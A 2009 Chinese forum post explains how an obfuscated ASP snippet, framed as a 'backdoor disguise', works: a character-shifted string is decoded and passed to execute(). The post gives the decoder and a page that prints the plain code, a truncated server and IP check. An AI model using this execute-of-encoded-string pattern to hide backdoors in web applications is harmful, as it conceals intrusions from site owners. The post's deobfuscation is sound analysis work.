搜索
查看: 9533|回复: 0

asp后门伪装——一种网页加密方法

[复制链接]
发表于 2009-3-7 20:35:32 | 显示全部楼层 |阅读模式

ASP加密的一种方法,貌似又称为“阿琳算法”,这个方法在2004年就有人发表过,今天碰到了这种加密,顺便把解密方法写一下。

0 \- {! k6 k; G8 ]0 k9 \7 D

 

6 `- e* }6 ]5 ^! E

ASP中有这么一段:

po="jq>Sfrvftu/TfswfsWbsjbcmft)#TFSWFS`OBNF#*胡tfswfsjq>#238/1/1/2#胡tfswfsjq3>#mpdbmiptu#胡tfswfsjq4>nje)jq-jotus)jq-#/#*,2-mfo)jq*.!jotus)jq-#/#**胡jg!jq>tfswfsjq!ps!jq>tfswfsjq3!ps!tfswfsjq4>#238/1/1/2#!uifo胡tfu!st>tfswfs/DsfbufPckfdu)#……(后面省掉,大体这个意思)"
execute(UnEncode(po))

这个就是一个加密代码,加密的原理是能够将字符做程序代码来执行。UnEncode()函数实际上是一个字符操作函数.因为我们知道
execute()函数只能执行可执行的字符,所以PO的值是不能直接被执行的,必须被解密成正常语句才可以,也就是说破解方式就在程序本身之中,我们再来看xpli.asp文件:
<%
function UnEncode(temp)
       but=1               
       for i =1 to len(temp)
            if mid(temp,i,1)<>"胡" then
                     pk=asc(mid(temp,i,1))-but
                     if pk>126 then
                               pk=pk-95
                     elseif pk<32 then
                               pk=pk+95
                     end if
                     a=a&chr(pk)
            else
                     a=a&vbcrlf
            end if
       next
       UnEncode=a
end function
%>

大家发现了没有PO的值被传递到了temp中,并在UnEncode()函数中被解码。
好了,解码方式就是这样。下面我给出解码程序。大家把这段代码复制下来把里面的PO的值改成你要破解的内容(shopxp中还有其他加密的地方),存为po.asp,然后在浏览器中运行就可以看到结果了。

<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<head>

<%
dim i,pk,but,a,b
       b="jq>Sfrvftu/TfswfsWbsjbcmft)#TFSWFS`OBNF#*胡tfswfsjq>#238/1/1/2#胡tfswfsjq3>#mpdbmiptu#胡tfswfsjq4>nje)jq-jotus)jq-#/#*,2-mfo)jq*.!jotus)jq-#/#**胡jg!jq>tfswfsjq!ps!jq>tfswfsjq3!ps!tfswfsjq4>#238/1/1/2#!uifo胡tfu!st>)……(后面省掉,大体这个意思)"
    but=1
      a=""       
       for i =1 to len(b)
            if mid(b,i,1)<>"胡" then
                     pk=asc(mid(b,i,1))-but
                     if pk>126 then
                               pk=pk-95
                     elseif pk<32 then
                               pk=pk+95
                     end if
                     a=a&chr(pk)
            else
                     a=a&vbcrlf
            end if
       next
%>
</head>
<body>
<%= a %>
</body>
</html>
解密的程序一般都能找到,数值方面大同小异,因为如果不解密网站也无法运行,如果用其他方法,只要看它开头的函数就能猜到是什么方法,然后找到对应的解密工具就可以啦~~O(∩_∩)O哈哈~

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册帐号

本版积分规则

热议作品
精华帖子排行
精彩推荐

虾皮社区,成立十年了!

站长自己也搞不懂想做个什么,反正就是一直在努力的做!

Copyright © 2007-2019 xp6.org Powered by Discuz

QQ|Archiver|手机版|小黑屋|虾皮社区 鲁公网安备 37021102000261号 |网站地图
返回顶部 返回列表